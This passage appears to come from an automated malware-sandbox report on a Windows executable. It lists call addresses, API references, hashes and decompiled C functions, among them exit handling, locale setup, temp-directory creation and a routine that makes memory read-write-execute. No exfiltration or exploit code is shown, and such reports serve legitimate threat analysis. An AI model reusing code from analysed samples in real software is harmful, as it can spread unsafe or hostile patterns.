                                                                    0x00000000
                                                                    0x00403fdf
                                                                    0x00403fc7
                                                                    0x00404000
                                                                    0x00404004
                                                                    0x00404004
                                                                    0x0040400a
                                                                    0x0040407c
                                                                    0x00404080
                                                                    0x00404086
                                                                    0x00404088
                                                                    0x004040b0
                                                                    0x004040b4
                                                                    0x004040b6
                                                                    0x004040bb
                                                                    0x004040bd
                                                                    0x004040bf
                                                                    0x00000000
                                                                    0x004040c1
                                                                    0x004040c1
                                                                    0x004040c6
                                                                    0x004040c8
                                                                    0x004040c9
                                                                    0x004040ca
                                                                    0x004040cb
                                                                    0x004040cb
                                                                    0x0040408a
                                                                    0x0040408a
                                                                    0x00404090
                                                                    0x00404094
                                                                    0x0040409a
                                                                    0x0040409c
                                                                    0x0040409e
                                                                    0x0040409e
                                                                    0x004040a0
                                                                    0x004040a2
                                                                    0x004040a8
                                                                    0x00000000
                                                                    0x004040a8
                                                                    0x0040400c
                                                                    0x0040400c
                                                                    0x0040400f
                                                                    0x00404016
                                                                    0x0040401d
                                                                    0x00404020
                                                                    0x00404023
                                                                    0x0040402a
                                                                    0x0040402d
                                                                    0x00404030
                                                                    0x00404033
                                                                    0x00404035
                                                                    0x00404037
                                                                    0x00404039
                                                                    0x0040403e
                                                                    0x00404040
                                                                    0x00404040
                                                                    0x00404040
                                                                    0x00404047
                                                                    0x00404049
                                                                    0x00404049
                                                                    0x00404047
                                                                    0x00404050
                                                                    0x00404055
                                                                    0x00404058
                                                                    0x0040405e
                                                                    0x004040cc
                                                                    0x004040cc
                                                                    0x004040cc
                                                                    0x00404060
                                                                    0x00404060
                                                                    0x00404062
                                                                    0x00404066
                                                                    0x00404068
                                                                    0x0040406b
                                                                    0x0040406e
                                                                    0x00404071
                                                                    0x00404075
                                                                    0x00404075
                                                                    0x004040d1
                                                                    0x004040d1
                                                                    0x004040d1
                                                                    0x004040d4
                                                                    0x004040d7
                                                                    0x004040d9
                                                                    0x004040de
                                                                    0x004040e0
                                                                    0x004040e3
                                                                    0x004040ea
                                                                    0x004040ed
                                                                    0x004040ed
                                                                    0x004040f0
                                                                    0x004040f4
                                                                    0x004040f7
                                                                    0x004040fa
                                                                    0x004040fc
                                                                    0x004040fc
                                                                    0x004040fe
                                                                    0x00404101
                                                                    0x00404104
                                                                    0x00404107
                                                                    0x00404108
                                                                    0x00404109
                                                                    0x0040410a
                                                                    0x0040410a
                                                                    0x00403f46
                                                                    0x00403f46
                                                                    0x00403f46
                                                                    0x00403f46
                                                                    0x00403f4a
                                                                    0x00403f4d
                                                                    0x00403f50
                                                                    0x00403f53
                                                                    0x00403f54
                                                                    0x00403f54
                                                                    0x00403f21
                                                                    0x00403f21
                                                                    0x00403f25
                                                                    0x00403f25
                                                                    0x00403f28
                                                                    0x00403f2b
                                                                    0x00403f2e
                                                                    0x00403f58
                                                                    0x00403f5b
                                                                    0x00403f5e
                                                                    0x00403f61
                                                                    0x00403f64
                                                                    0x00403f65
                                                                    0x00403f30
                                                                    0x00403f30
                                                                    0x00403f33
                                                                    0x00403f34
                                                                    0x00403f34
                                                                    0x00403f2e
                                                                    0x00403f1f

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                                    • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                                    • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                                    • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                    • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
                                                                    • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                    • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF91C, Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004AF91C(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E004AF914(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}













                                                                    0x004af920
                                                                    0x004af923
                                                                    0x004af926
                                                                    0x004af92f
                                                                    0x004af93b
                                                                    0x004af942
                                                                    0x004af9ee
                                                                    0x004af9ee
                                                                    0x004af948
                                                                    0x004af9db
                                                                    0x004af9db
                                                                    0x004af9e1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af954
                                                                    0x004af9c7
                                                                    0x004af9d2
                                                                    0x004af9d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af95c
                                                                    0x004af95c
                                                                    0x004af961
                                                                    0x004af967
                                                                    0x004af986
                                                                    0x004af98d
                                                                    0x004af98f
                                                                    0x004af98f
                                                                    0x004af98d
                                                                    0x004af994
                                                                    0x004af9a5
                                                                    0x004af99c
                                                                    0x004af9a1
                                                                    0x004af9a1
                                                                    0x004af9af
                                                                    0x004af9c2
                                                                    0x004af9c2
                                                                    0x00000000
                                                                    0x004af9af
                                                                    0x004af954
                                                                    0x00000000
                                                                    0x004af9db

                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                                    • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
                                                                    • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Virtual$ProtectQuery$InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 2441996862-0
                                                                    • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                    • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                                    • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                    • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407750, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E00407750() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t46);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L8:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L14:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t15 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t15);
								_t31 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L8;
					} else {
						_t20 = E004054B4();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00405CE8(_t44);
							_t23 = E004054B4();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t33();
					} while ( *0x4bb054 != 0);
					L8:
					while(1) {
					}
				}
			}










                                                                    0x00407764
                                                                    0x00407766
                                                                    0x0040776b
                                                                    0x00407772
                                                                    0x00407772
                                                                    0x0040777e
                                                                    0x00407792
                                                                    0x0040779c
                                                                    0x0040779c
                                                                    0x004077a5
                                                                    0x004077c9
                                                                    0x004077cd
                                                                    0x004077d6
                                                                    0x004077d6
                                                                    0x004077dd
                                                                    0x004077fc
                                                                    0x004077fc
                                                                    0x00407805
                                                                    0x0040780c
                                                                    0x00407811
                                                                    0x00407813
                                                                    0x00407818
                                                                    0x0040781b
                                                                    0x0040781b
                                                                    0x0040781e
                                                                    0x00407821
                                                                    0x00407828
                                                                    0x00407828
                                                                    0x00407821
                                                                    0x00407811
                                                                    0x0040782f
                                                                    0x00407838
                                                                    0x0040783a
                                                                    0x0040783a
                                                                    0x00407841
                                                                    0x00407845
                                                                    0x00407845
                                                                    0x0040784d
                                                                    0x00407856
                                                                    0x00407858
                                                                    0x00407858
                                                                    0x00407861
                                                                    0x00407861
                                                                    0x00407873
                                                                    0x00407873
                                                                    0x00407875
                                                                    0x00407876
                                                                    0x00000000
                                                                    0x004077df
                                                                    0x004077df
                                                                    0x004077e4
                                                                    0x004077e8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004077ea
                                                                    0x004077ea
                                                                    0x004077ec
                                                                    0x004077f1
                                                                    0x004077f6
                                                                    0x004077f8
                                                                    0x00000000
                                                                    0x004077ea
                                                                    0x004077b0
                                                                    0x004077b0
                                                                    0x004077b0
                                                                    0x004077b9
                                                                    0x004077be
                                                                    0x004077c0
                                                                    0x00000000
                                                                    0x004077c9
                                                                    0x00000000
                                                                    0x004077c9

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                    • String ID: MZP
                                                                    • API String ID: 3490077880-2889622443
                                                                    • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                    • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                                    • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                    • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407748, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E00407748() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t50);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L9:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L15:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t18 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t18);
								_t34 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L9;
					} else {
						_t23 = E004054B4();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00405CE8(_t48);
							_t26 = E004054B4();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t36();
					} while ( *0x4bb054 != 0);
					L9:
					while(1) {
					}
				}
			}











                                                                    0x0040774a
                                                                    0x00407764
                                                                    0x00407766
                                                                    0x0040776b
                                                                    0x00407772
                                                                    0x00407772
                                                                    0x0040777e
                                                                    0x00407792
                                                                    0x0040779c
                                                                    0x0040779c
                                                                    0x004077a5
                                                                    0x004077c9
                                                                    0x004077cd
                                                                    0x004077d6
                                                                    0x004077d6
                                                                    0x004077dd
                                                                    0x004077fc
                                                                    0x004077fc
                                                                    0x00407805
                                                                    0x0040780c
                                                                    0x00407811
                                                                    0x00407813
                                                                    0x00407818
                                                                    0x0040781b
                                                                    0x0040781b
                                                                    0x0040781e
                                                                    0x00407821
                                                                    0x00407828
                                                                    0x00407828
                                                                    0x00407821
                                                                    0x00407811
                                                                    0x0040782f
                                                                    0x00407838
                                                                    0x0040783a
                                                                    0x0040783a
                                                                    0x00407841
                                                                    0x00407845
                                                                    0x00407845
                                                                    0x0040784d
                                                                    0x00407856
                                                                    0x00407858
                                                                    0x00407858
                                                                    0x00407861
                                                                    0x00407861
                                                                    0x00407873
                                                                    0x00407873
                                                                    0x00407875
                                                                    0x00407876
                                                                    0x00000000
                                                                    0x004077df
                                                                    0x004077df
                                                                    0x004077e4
                                                                    0x004077e8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004077ea
                                                                    0x004077ea
                                                                    0x004077ec
                                                                    0x004077f1
                                                                    0x004077f6
                                                                    0x004077f8
                                                                    0x00000000
                                                                    0x004077ea
                                                                    0x004077b0
                                                                    0x004077b0
                                                                    0x004077b0
                                                                    0x004077b9
                                                                    0x004077be
                                                                    0x004077c0
                                                                    0x00000000
                                                                    0x004077c9
                                                                    0x00000000
                                                                    0x004077c9

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                    • String ID: MZP
                                                                    • API String ID: 3490077880-2889622443
                                                                    • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                    • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                                    • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                    • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004B5000, Relevance: 6.0, APIs: 4, Instructions: 43threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E004B5000(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;

				_push(_t22);
				_push(0x4b50d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				 *0x4bb98c =  *0x4bb98c - 1;
				if( *0x4bb98c < 0) {
					E00405B74();
					E004051A8();
					SetThreadLocale(0x400); // executed
					E0040A250();
					 *0x4b700c = 2;
					 *0x4bb01c = 0x4036b0;
					 *0x4bb020 = 0x4036b8;
					 *0x4bb05a = 2;
					 *0x4bb060 = E0040CAA4();
					 *0x4bb008 = 0x4095a0;
					E00405BCC(E00405BB0());
					 *0x4bb068 = 0xd7b0;
					 *0x4bb344 = 0xd7b0;
					 *0x4bb620 = 0xd7b0;
					 *0x4bb050 = GetCommandLineW();
					 *0x4bb04c = E00403810();
					 *0x4bb97c = GetACP();
					 *0x4bb980 = 0x4b0;
					 *0x4bb044 = GetCurrentThreadId();
					E0040CAB8();
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4b50de);
				return 0;
			}





                                                                    0x004b5005
                                                                    0x004b5006
                                                                    0x004b500b
                                                                    0x004b500e
                                                                    0x004b5011
                                                                    0x004b5018
                                                                    0x004b501e
                                                                    0x004b5023
                                                                    0x004b502d
                                                                    0x004b5032
                                                                    0x004b5037
                                                                    0x004b503e
                                                                    0x004b5048
                                                                    0x004b5052
                                                                    0x004b505e
                                                                    0x004b5063
                                                                    0x004b5072
                                                                    0x004b5077
                                                                    0x004b5080
                                                                    0x004b5089
                                                                    0x004b5097
                                                                    0x004b50a1
                                                                    0x004b50ab
                                                                    0x004b50b0
                                                                    0x004b50bf
                                                                    0x004b50c4
                                                                    0x004b50c4
                                                                    0x004b50cb
                                                                    0x004b50ce
                                                                    0x004b50d1
                                                                    0x004b50d6

                                                                    APIs
                                                                    • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                                      • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                      • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                      • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                                    • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                                      • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                                    • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                                      • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                                    • String ID:
                                                                    • API String ID: 2740004594-0
                                                                    • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                    • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                                    • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                    • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AEFE8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x4af0e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E00422D70( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E00426F08(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E00419E18( &_v36, _t54, 0);
						_v24 = _v36;
						E004232EC(_t54,  &_v40);
						_v20 = _v40;
						E00426ED8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E0041F264(_v16, 1);
						E0040711C();
					}
				}
